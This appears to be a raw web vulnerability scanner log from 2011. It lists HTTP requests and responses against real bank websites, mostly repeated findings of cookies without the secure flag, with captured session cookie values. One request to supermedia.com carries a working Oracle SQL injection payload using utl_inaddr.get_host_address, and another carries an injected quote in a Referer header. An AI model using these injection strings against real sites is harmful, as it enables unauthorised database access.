GET /personal_banking/insurance.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/insurance.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 169
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/insurance.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/investing.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/investing.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 169
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/investing.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/loan_payment_hardship.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/loan_payment_hardship.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 181
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/loan_payment_hardship.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/loans_credit.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/loans_credit.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/loans_credit.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/mobile_banking.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/mobile_banking.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 174
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/mobile_banking.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/money_market_main.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/money_market_main.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 177
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/money_market_main.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/morgan_keegan.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/morgan_keegan.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/morgan_keegan.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/open_account.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/open_account.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 172
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/open_account.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/platinum_visa_check.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/platinum_visa_check.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/platinum_visa_check.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/private_client.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/private_client.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 174
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/private_client.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/regionsnet.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/regionsnet.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 170
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/regionsnet_bill_pay.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/regionsnet_bill_pay.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet_bill_pay.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/retirement_planning.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/retirement_planning.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 179
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/retirement_planning.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/savings_cds.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/savings_cds.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/savings_cds.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /personal_banking/trust_asset.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/personal_banking/trust_asset.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/personal_banking/trust_asset.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small_business.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /system/gateway.rf HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 302 Found Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.regions.com/system/gateway.rf Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 157
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.regions.com/system/gateway.rf">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /templateOverview.aspx HTTP/1.1 Host: www.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Connection: close Date: Thu, 03 Feb 2011 15:50:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><titl ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2297.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 5484 Content-Type: image/gif Last-Modified: Mon, 07 Jun 2010 17:39:23 GMT Accept-Ranges: bytes ETag: "20c8e25d686cb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2608.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 4948 Content-Type: image/gif Last-Modified: Tue, 26 Oct 2010 17:36:44 GMT Accept-Ranges: bytes ETag: "b0b6855b3475cb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2853.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 28854 Content-Type: image/jpeg Last-Modified: Wed, 26 Jan 2011 15:40:17 GMT Accept-Ranges: bytes ETag: "60c215556fbdcb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2859.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 3492 Content-Type: image/gif Last-Modified: Thu, 27 Jan 2011 15:21:16 GMT Accept-Ranges: bytes ETag: "a044d735becb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:17 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img2861.gif HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
Response
HTTP/1.1 200 OK Set-Cookie: www.regions.com-ssl=R1752032910; path=/ Content-Length: 4877 Content-Type: image/gif Last-Modified: Thu, 27 Jan 2011 16:22:00 GMT Accept-Ranges: bytes ETag: "504d5e533ebecb1:7c0f" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 15:49:18 GMT
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1752032910; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /virtualMedia/img482.jpg HTTP/1.1 Host: www.regions.com Connection: keep-alive Referer: https://www.regions.com/personal_banking.rf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js HTTP/1.1 Host: www.suntrust.com Connection: keep-alive Referer: https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 18:59:29 GMT Content-Type: application/x-javascript Last-Modified: Tue, 21 Oct 2008 20:11:32 GMT Accept-Ranges: bytes ETag: "8fb1ea35b933c91:228d" Server: Microsoft-IIS/6.0 Host-Name: P13B X-Powered-By: ASP.NET Set-Cookie: BIGipServerwww.suntrust.com-pvic=1000473610.20480.0000; path=/ Vary: Accept-Encoding, User-Agent Content-Length: 3569
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: www.supermedia.com Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/2/3/hsbcpremier/contact-us-form HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:09:13 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:10:13 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000iCqR-0svBcJPMWNx9j9Jai6:14k1jbteq; Path=/ Set-Cookie: CAMToken=zT+vap32WY2QfMIaqlxOBx3iIU4=; Path=/1; Secure S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34157
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
